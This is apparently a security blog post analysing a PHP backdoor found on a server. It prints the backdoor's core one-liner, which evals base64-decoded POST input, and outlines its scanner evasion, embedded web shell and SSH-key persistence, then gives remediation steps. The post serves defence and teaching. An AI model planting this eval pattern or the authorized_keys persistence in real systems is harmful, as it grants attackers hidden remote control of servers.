As developers and system architects, we often secure our code but neglect the silent threats lurking in old directories or clever obfuscations. Recently, I caught a stealthy PHP backdoor ((random_name).php) embedded in a system.
Instead of just deleting it, I decided to perform a full reverse engineering to understand exactly how it works, how it bypasses scanners, and how it maintains persistence on a server.
Here is a quick summary of what I found during the analysis.
π The Anatomy of the MalwareAt first glance, the file was heavily obfuscated using multiple layers of encoding to look like harmless gibberish. However, the core mechanism relied on a classic but dangerous pattern:
PHP// The malicious pattern used to execute hidden codeeval(base64_decode($_POST(‘encoded_payload’)));Key Techniques Used by the Attacker:Layered Obfuscation: The code utilized deep base64 nesting combined with string manipulation functions to evade signature-based security scanners.
Hidden Tar Extraction: Deep inside the encoded strings, the malware contained a compressed TAR structure. Once triggered, it extracts a full-featured web shell into the server directories.
SSH Persistence: The ultimate goal wasn’t just to execute commands onceβthe script was designed to inject malicious public keys into the server’s ~/.ssh/authorized_keys file, granting the attacker permanent, direct SSH access without leaving a footprint in the web logs.
π οΈ How to Protect Your SystemIf you suspect your server has been compromised, simply deleting the .php file might not be enough. You need to:
Check your ~/.ssh/authorized_keys for unauthorized entries.
Audit your system cronjobs to ensure the malware doesn’t have a re-infection script scheduled.
Implement strict file permissions (chmod 644 for files, 755 for directories) and disable dangerous PHP functions like eval(), exec(), and passthru() in your php.ini.
π Read the Full Deep DiveI have documented the complete step-by-step deobfuscation process, the code breakdown, directory structures, and full remediation steps on GitHub.
π See full analysis and source code breakdown here:
https://github.com/KhaiTrang1995/Malware-Analysis-Reports-PHP-Backdoor
Alternatively, you can view the repository directly:
Tags: #php #security #devsecops #malware
Leave a Reply